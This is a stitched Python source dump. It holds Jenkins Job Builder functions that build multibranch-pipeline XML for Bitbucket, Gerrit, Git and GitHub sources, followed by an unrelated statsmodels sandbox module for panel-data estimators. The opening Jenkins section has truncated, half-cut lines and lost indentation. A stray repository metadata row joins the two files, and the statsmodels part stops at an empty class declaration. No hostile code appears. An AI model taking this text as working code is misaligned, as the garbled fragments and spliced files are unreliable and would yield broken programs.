all_view_mapping = [
('', 'name', 'All'),
('', 'filterExecutors', False),
('', 'filterQueue', False),
]
helpers.convert_mapping_to_xml(
all_view, {}, all_view_mapping, fail_required=True)
XML.SubElement(all_view, 'properties', {
'class': 'hudson.model.View$PropertyList'
})
XML.SubElement(all_view, 'owner', {
'class': self.jenkins_class,
'reference': '../../..'
})
XML.SubElement(xml_parent, 'viewsTabBar', {
'class': 'hudson.views.DefaultViewsTabBar'
})
ner', {
'class': self.jenkins_class,
'reference': '../..'
})
ement(hm_plugin, 'nonRecursive').text = 'false'
ent, 'icon', {
'class': 'jenkins.branch.MetadataActionFolderIcon',
'plugin': 'branch-api',
})
XML.SubElement(icon, 'owner', {
'class': self.jenkins_class,
'reference': '../..'
})
helpers.convert_mapping_to_xml(ois, data, ois_mapping)
("12h", ("H H * * *", '43200000')),
("1d", ("H H * * *", '86400000')),
("2d", ("H H * * *", '172800000')),
("1w", ("H H * * *", '604800000')),
("2w", ("H H * * *", '1209600000')),
("4w", ("H H * * *", '2419200000')),
])
pft_val = data.get('periodic-folder-trigger')
if pft_val:
if not pft_map.get(pft_val):
raise InvalidAttributeError(
'periodic-folder-trigger',
pft_val,
pft_map.keys())
pft_path = (
'com.cloudbees.hudson.plugins.folder.computed.'
'PeriodicFolderTrigger')
pft = XML.SubElement(triggers, pft_path, {
'plugin': 'cloudbees-folder'
})
XML.SubElement(pft, 'spec').text = pft_map[pft_val][0]
XML.SubElement(pft, 'interval').text = pft_map[pft_val][1]
nch.MultiBranchProject$BranchSourceList',
'plugin': 'branch-api',
})
sources_data = XML.SubElement(sources, 'data')
XML.SubElement(sources, 'owner', {
'class': self.jenkins_class,
'reference': '../..',
})
valid_scm = [
'bitbucket',
'gerrit',
'git',
'github',
]
for scm_data in data.get('scm', None):
for scm in scm_data:
bs = XML.SubElement(
sources_data, 'jenkins.branch.BranchSource')
if scm == 'bitbucket':
bitbucket_scm(bs, scm_data[scm])
elif scm == 'gerrit':
gerrit_scm(bs, scm_data[scm])
elif scm == 'git':
git_scm(bs, scm_data[scm])
elif scm == 'github':
github_scm(bs, scm_data[scm])
else:
raise InvalidAttributeError('scm', scm_data, valid_scm)
_factory_class,
})
XML.SubElement(factory, 'owner', {
'class': self.jenkins_class,
'reference': '../..'
})
XML.SubElement(factory, 'scriptPath').text = data.get(
'script-path', 'Jenkinsfile')
return xml_parent
class WorkflowMultiBranchDefaults(WorkflowMultiBranch):
    """Multibranch pipeline project backed by the Pipeline Multibranch
    Defaults plugin.

    Only the Jenkins class names differ from ``WorkflowMultiBranch``; all
    XML generation is inherited from the parent class.
    """
    # Root project element class (read by the inherited root_xml via
    # self.jenkins_class).
    jenkins_class = (
        'org.jenkinsci.plugins.pipeline.multibranch'
        '.defaults.PipelineMultiBranchDefaultsProject')
    # Branch project factory class used for the project's <factory> element.
    jenkins_factory_class = (
        'org.jenkinsci.plugins.pipeline.multibranch'
        '.defaults.PipelineBranchDefaultsProjectFactory')
def bitbucket_scm(xml_parent, data):
    """Configure a Bitbucket SCM source for a multibranch project.

    Populates a ``BitbucketSCMSource`` element with the repository
    coordinates, then appends the requested discovery/filter traits,
    property and build strategies, and the common git extensions.

    :arg str repo-owner: The Bitbucket project/user name. (required)
    :arg str repo: The repository name. (required)
    :arg str credentials-id: Credentials used to scan the repository.
        (optional)
    :arg str server-url: The Bitbucket server URL. (optional)
    :arg bool discover-tags: Discovers tags on the repository. (optional)
    :arg str head-filter-regex: Regular expression for filtering
        discovered source branches. (optional)
    :arg str discover-pr-origin: Strategy for origin pull requests; one
        of mergeOnly, headOnly, mergeAndHead. (optional)
    :arg str discover-pr-forks-strategy: Strategy for fork pull requests;
        one of merge-current, current, both. (optional)
    :arg str discover-pr-forks-trust: Whom to trust for fork pull
        requests; one of contributors, everyone, permission, nobody.
        (default 'contributors')
    :arg str discover-branch: Branch discovery strategy; one of ex-pr,
        only-pr, all. (optional)
    :arg bool local-branch: Check out to a matching local branch.
        (optional)
    :arg dict checkout-over-ssh: Checkout repo over ssh, with optional
        **credentials**. (optional)
    :arg dict filter-by-name-wildcard: Filter heads by **includes** /
        **excludes** wildcards. (optional)
    """
    bb = 'com.cloudbees.jenkins.plugins.bitbucket'
    src = XML.SubElement(xml_parent, 'source', {
        'class': bb + '.BitbucketSCMSource',
        'plugin': 'cloudbees-bitbucket-branch-source',
    })
    helpers.convert_mapping_to_xml(src, data, [
        ('', 'id', '-'.join(['bb', data.get('repo-owner', ''),
                             data.get('repo', '')])),
        ('repo-owner', 'repoOwner', None),
        ('repo', 'repository', None),
    ], fail_required=True)
    helpers.convert_mapping_to_xml(src, data, [
        ('credentials-id', 'credentialsId', None),
        ('server-url', 'serverUrl', None),
    ], fail_required=False)

    traits = XML.SubElement(src, 'traits')

    if data.get('discover-tags', False):
        XML.SubElement(traits, bb + '.TagDiscoveryTrait')

    regex = data.get('head-filter-regex', None)
    if regex:
        head_filter = XML.SubElement(
            traits, 'jenkins.scm.impl.trait.RegexSCMHeadFilterTrait')
        XML.SubElement(head_filter, 'regex').text = regex

    if data.get('discover-pr-origin', None):
        origin_trait = XML.SubElement(
            traits, bb + '.OriginPullRequestDiscoveryTrait')
        helpers.convert_mapping_to_xml(origin_trait, data, [
            ('discover-pr-origin', 'strategyId', None,
             {'mergeOnly': '1', 'headOnly': '2', 'mergeAndHead': '3'}),
        ], fail_required=True)

    if data.get('discover-pr-forks-strategy'):
        fork_trait = XML.SubElement(
            traits, bb + '.ForkPullRequestDiscoveryTrait')
        helpers.convert_mapping_to_xml(fork_trait, data, [
            ('discover-pr-forks-strategy', 'strategyId', 'merge-current',
             {'merge-current': '1', 'current': '2', 'both': '3'}),
        ], fail_required=True)
        trust = data.get('discover-pr-forks-trust', 'contributors')
        trust_classes = {
            'contributors': 'TrustContributors',
            'everyone': 'TrustEveryone',
            'permission': 'TrustPermission',
            'nobody': 'TrustNobody',
        }
        if trust not in trust_classes:
            raise InvalidAttributeError('discover-pr-forks-trust',
                                        trust,
                                        trust_classes.keys())
        XML.SubElement(fork_trait, 'trust').attrib['class'] = (
            bb + '.ForkPullRequestDiscoveryTrait$' + trust_classes[trust])

    if data.get('discover-branch', None):
        branch_trait = XML.SubElement(traits, bb + '.BranchDiscoveryTrait')
        helpers.convert_mapping_to_xml(branch_trait, data, [
            ('discover-branch', 'strategyId', None,
             {'ex-pr': '1', 'only-pr': '2', 'all': '3'}),
        ], fail_required=True)

    if data.get('property-strategies', None):
        property_strategies(xml_parent, data)
    if data.get('build-strategies', None):
        build_strategies(xml_parent, data)

    if data.get('local-branch', False):
        local_branch = XML.SubElement(
            traits, 'jenkins.plugins.git.traits.LocalBranchTrait',
            {'plugin': 'git'})
        ext = XML.SubElement(local_branch, 'extension', {
            'class': 'hudson.plugins.git.extensions.impl.LocalBranch',
        })
        XML.SubElement(ext, 'localBranch').text = "**"

    if data.get('checkout-over-ssh', None):
        ssh_trait = XML.SubElement(traits, bb + '.SSHCheckoutTrait')
        helpers.convert_mapping_to_xml(
            ssh_trait,
            data.get('checkout-over-ssh'),
            [('credentials', 'credentialsId', '')],
            fail_required=True)

    if data.get('filter-by-name-wildcard', None):
        wildcard_trait = XML.SubElement(
            traits, 'jenkins.scm.impl.trait.WildcardSCMHeadFilterTrait',
            {'plugin': 'scm-api'})
        helpers.convert_mapping_to_xml(
            wildcard_trait,
            data.get('filter-by-name-wildcard', ''),
            [('includes', 'includes', ''), ('excludes', 'excludes', '')],
            fail_required=True)

    # Default git extensions shared with the other SCM sources.
    git_extensions(traits, data)
def gerrit_scm(xml_parent, data):
    """Configure a Gerrit SCM source for a multibranch project.

    Builds a ``GerritSCMSource`` element under *xml_parent*, wires in
    the remote url/credentials, the change discovery trait and the
    refspec templates, then applies any property and build strategies.
    """
    src = XML.SubElement(xml_parent, 'source', {
        'class': 'jenkins.plugins.gerrit.GerritSCMSource',
        'plugin': 'gerrit',
    })
    helpers.convert_mapping_to_xml(src, data, [
        ('', 'id', '-'.join(['gr', data.get('url', '')])),
        ('url', 'remote', None),
        ('credentials-id', 'credentialsId', ''),
        ('includes', 'includes', '*'),
        ('excludes', 'excludes', ''),
        ('ignore-on-push-notifications', 'ignoreOnPushNotifications', True),
    ], fail_required=True)
    helpers.convert_mapping_to_xml(
        src, data, [('api-uri', 'apiUri', None)], fail_required=False)

    traits = XML.SubElement(src, 'traits')
    XML.SubElement(
        traits, 'jenkins.plugins.gerrit.traits.ChangeDiscoveryTrait')

    refspec_trait = XML.SubElement(
        traits, 'jenkins.plugins.git.traits.RefSpecsSCMSourceTrait',
        {'plugin': 'git'})
    templates = XML.SubElement(refspec_trait, 'templates')
    specs = data.get('refspecs', [
        '+refs/changes/*:refs/remotes/@{remote}/*',
        '+refs/heads/*:refs/remotes/@{remote}/*',
    ])
    # A lone refspec string is accepted and normalized to a list.
    if isinstance(specs, six.string_types):
        specs = [specs]
    for spec in specs:
        tmpl = XML.SubElement(
            templates, ('jenkins.plugins.git.traits'
                        '.RefSpecsSCMSourceTrait_-RefSpecTemplate'))
        XML.SubElement(tmpl, 'value').text = spec

    if data.get('property-strategies', None):
        property_strategies(xml_parent, data)
    if data.get('build-strategies', None):
        build_strategies(xml_parent, data)
def git_scm(xml_parent, data):
source = XML.SubElement(xml_parent, 'source', {
'class': 'jenkins.plugins.git.GitSCMSource',
'plugin': 'git',
})
source_mapping = [
('', 'id', '-'.join(['gt', data.get('url', '')])),
('url', 'remote', None),
('credentials-id', 'credentialsId', ''),
]
helpers.convert_mapping_to_xml(
source, data, source_mapping, fail_required=True)
ce, 'traits')
if data.get('discover-branches', True):
XML.SubElement(traits, ''.join([traits_path, '.BranchDiscoveryTrait']))
if data.get('discover-tags', False):
XML.SubElement(traits, ''.join([traits_path, '.TagDiscoveryTrait']))
if data.get('ignore-on-push-notifications', False):
XML.SubElement(
traits, ''.join([traits_path, '.IgnoreOnPushNotificationTrait']))
if data.get('head-filter-regex', None):
rshf = XML.SubElement(traits,
'jenkins.scm.impl.trait.RegexSCMHeadFilterTrait')
XML.SubElement(rshf, 'regex').text = data.get('head-filter-regex')
if data.get('property-strategies', None):
property_strategies(xml_parent, data)
if data.get('build-strategies', None):
build_strategies(xml_parent, data)
git_extensions(traits, data)
def github_scm(xml_parent, data):
    """Configure a GitHub branch source for a multibranch project.

    Appends a ``<source>`` element (class GitHubSCMSource) to
    *xml_parent* and emits one trait element per requested feature:
    branch discovery, ssh checkout, tag discovery, fork/origin PR
    discovery, property/build strategies, git extensions and
    PR-notification suppression.
    """
    # Plugin package path; the *_dscore variant doubles each underscore,
    # which is how Jenkins escapes '_' in XML element tag names.
    github_path = 'org.jenkinsci.plugins.github_branch_source'
    github_path_dscore = 'org.jenkinsci.plugins.github__branch__source'
    source = XML.SubElement(xml_parent, 'source', {
        'class': ''.join([github_path, '.GitHubSCMSource']),
        'plugin': 'github-branch-source',
    })
    # Required options: a stable id derived from owner/repo, plus the
    # owner and repository names themselves.
    mapping = [
        ('', 'id', '-'.join(['gh', data.get('repo-owner', ''),
                             data.get('repo', '')])),
        ('repo-owner', 'repoOwner', None),
        ('repo', 'repository', None),
    ]
    helpers.convert_mapping_to_xml(
        source, data, mapping, fail_required=True)
    # Optional options: only emitted when present in the YAML.
    mapping_optional = [
        ('api-uri', 'apiUri', None),
        ('credentials-id', 'credentialsId', None),
    ]
    helpers.convert_mapping_to_xml(
        source, data, mapping_optional, fail_required=False)
    traits = XML.SubElement(source, 'traits')
    # Branch discovery strategy (default 'no-pr').
    if data.get('branch-discovery', 'no-pr'):
        bd = XML.SubElement(traits, ''.join([
            github_path_dscore, '.BranchDiscoveryTrait']))
        bd_strategy = {
            'no-pr': '1',
            'only-pr': '2',
            'all': '3',
        }
        bd_mapping = [
            ('branch-discovery', 'strategyId', 'no-pr', bd_strategy)
        ]
        helpers.convert_mapping_to_xml(
            bd, data, bd_mapping, fail_required=True)
    # ssh-checkout may be a bool (agent key) or a mapping with explicit
    # credentials.
    if data.get('ssh-checkout', None):
        cossh = XML.SubElement(
            traits, ''.join([
                github_path_dscore, '.SSHCheckoutTrait'
            ])
        )
        if not isinstance(data.get('ssh-checkout'), bool):
            cossh_credentials = [
                ('credentials', 'credentialsId', ''),
            ]
            helpers.convert_mapping_to_xml(
                cossh,
                data.get('ssh-checkout'),
                cossh_credentials,
                fail_required=True)
    if data.get('discover-tags', False):
        XML.SubElement(
            traits, ''.join([
                github_path_dscore, '.TagDiscoveryTrait'
            ])
        )
    # Fork pull-request discovery: strategy id plus a trust policy class.
    if data.get('discover-pr-forks-strategy', 'merged-current'):
        dprf = XML.SubElement(
            traits, ''.join([
                github_path_dscore, '.ForkPullRequestDiscoveryTrait'
            ])
        )
        dprf_strategy = {
            'merge-current': '1',
            'current': '2',
            'both': '3',
        }
        dprf_mapping = [
            ('discover-pr-forks-strategy', 'strategyId', 'merge-current',
             dprf_strategy)
        ]
        helpers.convert_mapping_to_xml(
            dprf, data, dprf_mapping, fail_required=True)
        trust = data.get('discover-pr-forks-trust', 'contributors')
        trust_map = {
            'contributors': ''.join([
                github_path,
                '.ForkPullRequestDiscoveryTrait$TrustContributors']),
            'everyone': ''.join([
                github_path,
                '.ForkPullRequestDiscoveryTrait$TrustEveryone']),
            'permission': ''.join([
                github_path,
                '.ForkPullRequestDiscoveryTrait$TrustPermission']),
            'nobody': ''.join([
                github_path,
                '.ForkPullRequestDiscoveryTrait$TrustNobody']),
        }
        if trust not in trust_map:
            raise InvalidAttributeError('discover-pr-forks-trust',
                                        trust,
                                        trust_map.keys())
        XML.SubElement(dprf, 'trust').attrib['class'] = trust_map[trust]
    # Origin pull-request discovery (always emitted; strategy validated
    # before the mapping is applied).
    dpro_strategy = data.get('discover-pr-origin', 'merge-current')
    dpro = XML.SubElement(traits, ''.join([
        github_path_dscore,
        '.OriginPullRequestDiscoveryTrait'
    ]))
    dpro_strategy_map = {
        'merge-current': '1',
        'current': '2',
        'both': '3',
    }
    if dpro_strategy not in dpro_strategy_map:
        raise InvalidAttributeError('discover-pr-origin',
                                    dpro_strategy,
                                    dpro_strategy_map.keys())
    dpro_mapping = [
        ('discover-pr-origin', 'strategyId', 'merge-current',
         dpro_strategy_map)
    ]
    helpers.convert_mapping_to_xml(
        dpro, data, dpro_mapping, fail_required=True)
    if data.get('property-strategies', None):
        property_strategies(xml_parent, data)
    if data.get('build-strategies', None):
        build_strategies(xml_parent, data)
    git_extensions(traits, data)
    disable_github_status_path_dscore = (
        'com.adobe.jenkins.disable__github__multibranch__status')
    if data.get('disable-pr-notifications', False):
        XML.SubElement(
            traits, ''.join([
                disable_github_status_path_dscore, '.DisableStatusUpdateTrait'
            ]), {
                'plugin': 'disable-github-multibranch-status'
            }
        )
def build_strategies(xml_parent, data):
    """Emit a ``<buildStrategies>`` element for a branch source.

    Each entry of ``data['build-strategies']`` may request any of:
    ``tags`` (with day-based age windows), ``regular-branches``,
    ``change-request`` and ``named-branches`` (exact / regex / wildcard
    name filters). All strategy elements come from the
    basic-branch-build-strategies plugin.
    """
    basic_build_strategies = 'jenkins.branch.buildstrategies.basic'
    bbs = XML.SubElement(xml_parent, 'buildStrategies')
    for bbs_list in data.get('build-strategies', None):
        if 'tags' in bbs_list:
            tags = bbs_list['tags']
            tags_elem = XML.SubElement(bbs, ''.join([basic_build_strategies,
                                       '.TagBuildStrategyImpl']), {
                'plugin': 'basic-branch-build-strategies',
            })
            # Age windows are given in days; the plugin wants
            # milliseconds (86400000 ms per day). -1 means "no bound".
            newer_than = -1
            if ('ignore-tags-newer-than' in tags and
                    tags['ignore-tags-newer-than'] >= 0):
                newer_than = str(tags['ignore-tags-newer-than'] * 86400000)
            XML.SubElement(tags_elem, 'atMostMillis').text = str(newer_than)
            older_than = -1
            if ('ignore-tags-older-than' in tags and
                    tags['ignore-tags-older-than'] >= 0):
                older_than = str(tags['ignore-tags-older-than'] * 86400000)
            XML.SubElement(tags_elem, 'atLeastMillis').text = str(older_than)
        if bbs_list.get('regular-branches', False):
            XML.SubElement(bbs, ''.join([basic_build_strategies,
                           '.BranchBuildStrategyImpl']), {
                'plugin': 'basic-branch-build-strategies',
            })
        if 'change-request' in bbs_list:
            cr = bbs_list['change-request']
            cr_elem = XML.SubElement(bbs, ''.join([basic_build_strategies,
                                     '.ChangeRequestBuildStrategyImpl']), {
                'plugin': 'basic-branch-build-strategies',
            })
            itoc = cr.get('ignore-target-only-changes', False)
            XML.SubElement(cr_elem, 'ignoreTargetOnlyChanges').text = (
                str(itoc).lower())
        if 'named-branches' in bbs_list:
            named_branch_elem = XML.SubElement(bbs, ''.join(
                [basic_build_strategies, '.NamedBranchBuildStrategyImpl']), {
                'plugin': 'basic-branch-build-strategies',
            })
            filters = XML.SubElement(named_branch_elem, 'filters')
            # Each named-branches entry adds one filter element per
            # filter kind it defines.
            for nb in bbs_list['named-branches']:
                if 'exact-name' in nb:
                    exact_name_elem = XML.SubElement(filters, ''.join(
                        [basic_build_strategies,
                         '.NamedBranchBuildStrategyImpl',
                         '_-ExactNameFilter']))
                    exact_name_mapping = [
                        ('name', 'name', ''),
                        ('case-sensitive', 'caseSensitive', False)
                    ]
                    helpers.convert_mapping_to_xml(
                        exact_name_elem,
                        nb['exact-name'],
                        exact_name_mapping,
                        fail_required=False)
                if 'regex-name' in nb:
                    regex_name_elem = XML.SubElement(filters, ''.join([
                        basic_build_strategies,
                        '.NamedBranchBuildStrategyImpl',
                        '_-RegexNameFilter']))
                    regex_name_mapping = [
                        ('regex', 'regex', '^.*$'),
                        ('case-sensitive', 'caseSensitive', False)
                    ]
                    helpers.convert_mapping_to_xml(
                        regex_name_elem, nb['regex-name'],
                        regex_name_mapping, fail_required=False)
                if 'wildcards-name' in nb:
                    wildcards_name_elem = XML.SubElement(filters, ''.join([
                        basic_build_strategies,
                        '.NamedBranchBuildStrategyImpl',
                        '_-WildcardsNameFilter']))
                    wildcards_name_mapping = [
                        ('includes', 'includes', '*'),
                        ('excludes', 'excludes', '')
                    ]
                    helpers.convert_mapping_to_xml(
                        wildcards_name_elem,
                        nb['wildcards-name'],
                        wildcards_name_mapping,
                        fail_required=False)
def property_strategies(xml_parent, data):
    """Emit the branch property ``<strategy>`` element.

    Handles the ``all-branches`` entries of
    ``data['property-strategies']``: SCM-trigger suppression and the
    pipeline branch durability override (value validated against
    *pbdo_map*).
    """
    # YAML value -> Jenkins DurabilityHint enum name.
    pbdo_map = collections.OrderedDict([
        ("max-survivability", "MAX_SURVIVABILITY"),
        ("performance-optimized", "PERFORMANCE_OPTIMIZED"),
        ("survivable-nonatomic", "SURVIVABLE_NONATOMIC"),
    ])
    basic_property_strategies = 'jenkins.branch'
    workflow_multibranch = 'org.jenkinsci.plugins.workflow.multibranch'
    dbps = XML.SubElement(xml_parent, 'strategy', {
        'class': ''.join([basic_property_strategies,
                          '.DefaultBranchPropertyStrategy'])})
    prop_strats = data.get('property-strategies', None)
    if prop_strats:
        # Two-level wrapper required by the Jenkins XML serialization.
        props_elem = XML.SubElement(dbps, 'properties', {
            'class': 'java.util.Arrays$ArrayList'})
        props_elem = XML.SubElement(props_elem, 'a', {
            'class': ''.join([
                basic_property_strategies, '.BranchProperty-array'])})
        for dbs_list in prop_strats.get('all-branches', None):
            if dbs_list.get('suppress-scm-triggering', False):
                XML.SubElement(props_elem, ''.join([
                    basic_property_strategies, '.NoTriggerBranchProperty']))
            pbdo_val = dbs_list.get(
                'pipeline-branch-durability-override', None)
            if pbdo_val:
                if not pbdo_map.get(pbdo_val):
                    raise InvalidAttributeError(
                        'pipeline-branch-durability-override',
                        pbdo_val,
                        pbdo_map.keys())
                pbdo_elem = XML.SubElement(props_elem, ''.join([
                    workflow_multibranch, '.DurabilityHintBranchProperty']), {
                    'plugin': 'workflow-multibranch'})
                XML.SubElement(pbdo_elem, 'hint').text = pbdo_map.get(pbdo_val)
| true | true |
1c331b7cfdd6aa03faae6c1b5bc0b4e9acbe92d9 | 14,571 | py | Python | venv/lib/python3.8/site-packages/statsmodels/sandbox/panel/panelmod.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 6,931 | 2015-01-01T11:41:55.000Z | 2022-03-31T17:03:24.000Z | venv/lib/python3.8/site-packages/statsmodels/sandbox/panel/panelmod.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 6,137 | 2015-01-01T00:33:45.000Z | 2022-03-31T22:53:17.000Z | venv/lib/python3.8/site-packages/statsmodels/sandbox/panel/panelmod.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 2,608 | 2015-01-02T21:32:31.000Z | 2022-03-31T07:38:30.000Z | """
Sandbox Panel Estimators
References
-----------
Baltagi, Badi H. `Econometric Analysis of Panel Data.` 4th ed. Wiley, 2008.
"""
from functools import reduce
import numpy as np
from statsmodels.regression.linear_model import GLS
__all__ = ["PanelModel"]
from pandas import Panel
def group(X):
    """
    Return a numeric group id for each element of `X`, numbered in order
    of first appearance (no sorting).

    Parameters
    ----------
    X : array_like
        1-d sequence of hashable group labels.

    Returns
    -------
    ndarray of float
        Same length as `X`; equal labels share an id, ids start at 0.

    Examples
    --------
    >>> X = np.array(['a','a','b','c','b','c'])
    >>> g = group(X)
    >>> g
    array([ 0.,  0.,  1.,  2.,  1.,  2.])
    """
    # Fixes the original doctest, which called group(X) without binding
    # the result yet displayed ``g`` on the next line.
    uniq_dict = {}
    out = np.zeros(len(X))  # avoid shadowing the function name
    for i, label in enumerate(X):
        # setdefault hands out the next free id on first sight of a label
        out[i] = uniq_dict.setdefault(label, len(uniq_dict))
    return out
def repanel_cov(groups, sigmas):
    '''error covariance matrix (plus inverse and inverse square root)
    for a random effects panel model

    Parameters
    ----------
    groups : ndarray, (nobs, nre) or (nobs,)
        group/category membership per observation
    sigmas : ndarray, (nre+1,)
        standard deviations of the random effects; the last entry is the
        standard deviation of the idiosyncratic error

    Returns
    -------
    omega : ndarray, (nobs, nobs)
        covariance matrix of error
    omegainv : ndarray, (nobs, nobs)
        inverse covariance matrix of error
    omegainvsqrt : ndarray, (nobs, nobs)
        square-root inverse covariance matrix H, with H H' = omegainv

    Notes
    -----
    Builds dense nobs-by-nobs matrices; no sparse shortcut is used and
    omegainvsqrt is not sparse either.
    '''
    if groups.ndim == 1:
        groups = groups[:, None]
    nobs, n_effects = groups.shape
    # start from the idiosyncratic part, then add one block per effect
    omega = sigmas[-1] * np.eye(nobs)
    for j in range(n_effects):
        col = groups[:, j:j + 1]
        levels = np.unique(col)
        scaled_dummies = sigmas[j] * (col == levels).astype(float)
        omega += scaled_dummies.dot(scaled_dummies.T)
    # eigh (not eig) because omega is symmetric
    eigvals, eigvecs = np.linalg.eigh(omega)
    omegainv = eigvecs.dot((1 / eigvals * eigvecs).T)
    omegainvhalf = eigvecs / np.sqrt(eigvals)
    return omega, omegainv, omegainvhalf
class PanelData(Panel):
    # Thin placeholder subclass of pandas.Panel; adds no behavior yet.
    # NOTE(review): pandas.Panel was removed in pandas 0.25, so this
    # only imports under the old pandas this sandbox module targets.
    pass
class PanelModel(object):
    """
    An abstract statistical model class for panel (longitudinal) datasets.

    Parameters
    ----------
    endog : array_like or str
        If a pandas object is used then endog should be the name of the
        endogenous variable as a string.
#    exog
#    panel_arr
#    time_arr
    panel_data : pandas.Panel object

    Notes
    -----
    If a pandas object is supplied it is assumed that the major_axis is time
    and that the minor_axis has the panel variable.
    """
    def __init__(self, endog=None, exog=None, panel=None, time=None,
                 xtnames=None, equation=None, panel_data=None):
        if panel_data is None:
#        if endog == None and exog == None and panel == None and \
#            time == None:
#            raise ValueError("If pandel_data is False then endog, exog, \
#panel_arr, and time_arr cannot be None.")
            self.initialize(endog, exog, panel, time, xtnames, equation)
#        elif aspandas != False:
#            if not isinstance(endog, str):
#                raise ValueError("If a pandas object is supplied then endog \
#must be a string containing the name of the endogenous variable")
#            if not isinstance(aspandas, Panel):
#                raise ValueError("Only pandas.Panel objects are supported")
#            self.initialize_pandas(endog, aspandas, panel_name)

    def initialize(self, endog, exog, panel, time, xtnames, equation):
        """
        Initialize plain array model.

        See PanelModel
        """
#TODO: for now, we are going assume a constant, and then make the first
#panel the base, add a flag for this....
        # get names
        names = equation.split(" ")
        self.endog_name = names[0]
        exog_names = names[1:]  # this makes the order matter in the array
        self.panel_name = xtnames[0]
        self.time_name = xtnames[1]
        # detect a constant column (zero variance) and label it 'cons'
        novar = exog.var(0) == 0
        if True in novar:
            cons_index = np.where(novar == 1)[0][0]  # constant col. num
            exog_names.insert(cons_index, 'cons')
            self._cons_index = novar  # used again in fit_fixed
        self.exog_names = exog_names
        self.endog = np.squeeze(np.asarray(endog))
        exog = np.asarray(exog)
        self.exog = exog
        self.panel = np.asarray(panel)
        self.time = np.asarray(time)
        self.paneluniq = np.unique(panel)
        self.timeuniq = np.unique(time)
#TODO: this structure can possibly be extracted somewhat to deal with
#names in general
#TODO: add some dimension checks, etc.

#    def initialize_pandas(self, endog, aspandas):
#        """
#        Initialize pandas objects.
#
#        See PanelModel.
#        """
#        self.aspandas = aspandas
#        endog = aspandas[endog].values
#        self.endog = np.squeeze(endog)
#        exog_name = aspandas.columns.tolist()
#        exog_name.remove(endog)
#        self.exog = aspandas.filterItems(exog_name).values
#TODO: can the above be simplified to slice notation?
#        if panel_name != None:
#            self.panel_name = panel_name
#        self.exog_name = exog_name
#        self.endog_name = endog
#        self.time_arr = aspandas.major_axis
#TODO: is time always handled correctly in fromRecords?
#        self.panel_arr = aspandas.minor_axis
#TODO: all of this might need to be refactored to explicitly rely (internally)
# on the pandas LongPanel structure for speed and convenience.
# not sure this part is finished...
#TODO: does not conform to new initialize
    def initialize_pandas(self, panel_data, endog_name, exog_name):
        """
        Initialize from a pandas.Panel; endog is pulled out by name and
        exog defaults to all remaining columns.
        """
        self.panel_data = panel_data
        endog = panel_data[endog_name].values  # does this create a copy?
        self.endog = np.squeeze(endog)
        if exog_name is None:
            exog_name = panel_data.columns.tolist()
            exog_name.remove(endog_name)
        self.exog = panel_data.filterItems(exog_name).values  # copy?
        self._exog_name = exog_name
        self._endog_name = endog_name
        self._timeseries = panel_data.major_axis  # might not need these
        self._panelseries = panel_data.minor_axis

#TODO: this could be pulled out and just have a by kwd that takes
# the panel or time array
#TODO: this also needs to be expanded for 'twoway'
    def _group_mean(self, X, index='oneway', counts=False, dummies=False):
        """
        Get group means of X by time or by panel.

        index default is panel
        """
        if index == 'oneway':
            Y = self.panel
            uniq = self.paneluniq
        elif index == 'time':
            Y = self.time
            uniq = self.timeuniq
        else:
            raise ValueError("index %s not understood" % index)
        # NOTE(review): debugging print left in place on purpose.
        print(Y, uniq, uniq[:,None], len(Y), len(uniq), len(uniq[:,None]),
            index)
        #TODO: use sparse matrices
        # one-hot membership matrix: one row per group, one column per obs
        dummy = (Y == uniq[:,None]).astype(float)
        if X.ndim > 1:
            mean = np.dot(dummy,X)/dummy.sum(1)[:,None]
        else:
            mean = np.dot(dummy,X)/dummy.sum(1)
        if counts is False and dummies is False:
            return mean
        elif counts is True and dummies is False:
            return mean, dummy.sum(1)
        elif counts is True and dummies is True:
            return mean, dummy.sum(1), dummy
        elif counts is False and dummies is True:
            return mean, dummy

#TODO: Use kwd arguments or have fit_method methods?
    def fit(self, model=None, method=None, effects='oneway'):
        """
        method : LSDV, demeaned, MLE, GLS, BE, FE, optional
        model :
                between
                fixed
                random
                pooled
                [gmm]
        effects :
                oneway
                time
                twoway
        femethod : demeaned (only one implemented)
                   WLS
        remethod :
                swar -
                amemiya
                nerlove
                walhus

        Notes
        -----
        This is unfinished. None of the method arguments work yet.
        Only oneway effects should work.
        """
        if method:  # get rid of this with default
            method = method.lower()
        model = model.lower()
        if method and method not in ["lsdv", "demeaned", "mle",
                                     "gls", "be", "fe"]:
            # get rid of if method with default
            raise ValueError("%s not a valid method" % method)
#        if method == "lsdv":
#            self.fit_lsdv(model)
        if model == 'pooled':
            return GLS(self.endog, self.exog).fit()
        if model == 'between':
            return self._fit_btwn(method, effects)
        if model == 'fixed':
            return self._fit_fixed(method, effects)

#    def fit_lsdv(self, effects):
#        """
#        Fit using least squares dummy variables.
#
#        Notes
#        -----
#        Should only be used for small `nobs`.
#        """
#        pdummies = None
#        tdummies = None

    def _fit_btwn(self, method, effects):
        """Between estimator: OLS on the group (or time) means."""
        # group mean regression or WLS
        if effects != "twoway":
            endog = self._group_mean(self.endog, index=effects)
            exog = self._group_mean(self.exog, index=effects)
        else:
            raise ValueError("%s effects is not valid for the between "
                             "estimator" % effects)
        befit = GLS(endog, exog).fit()
        return befit

    def _fit_fixed(self, method, effects):
        """Fixed effects (within) estimator via demeaning."""
        endog = self.endog
        exog = self.exog
        demeantwice = False
        if effects in ["oneway","twoways"]:
            if effects == "twoways":
                demeantwice = True
                effects = "oneway"
            # demean by panel; np.repeat expands each group's mean back
            # to observation length using the per-group counts
            endog_mean, counts = self._group_mean(endog, index=effects,
                counts=True)
            exog_mean = self._group_mean(exog, index=effects)
            counts = counts.astype(int)
            endog = endog - np.repeat(endog_mean, counts)
            exog = exog - np.repeat(exog_mean, counts, axis=0)
        if demeantwice or effects == "time":
            endog_mean, dummies = self._group_mean(endog, index="time",
                dummies=True)
            exog_mean = self._group_mean(exog, index="time")
            # This allows unbalanced panels
            endog = endog - np.dot(endog_mean, dummies)
            exog = exog - np.dot(dummies.T, exog_mean)
        # select the non-constant columns (negated constant-column mask);
        # demeaning makes the constant identically zero
        fefit = GLS(endog, exog[:,-self._cons_index]).fit()
        #TODO: might fail with one regressor
        return fefit
class SURPanel(PanelModel):
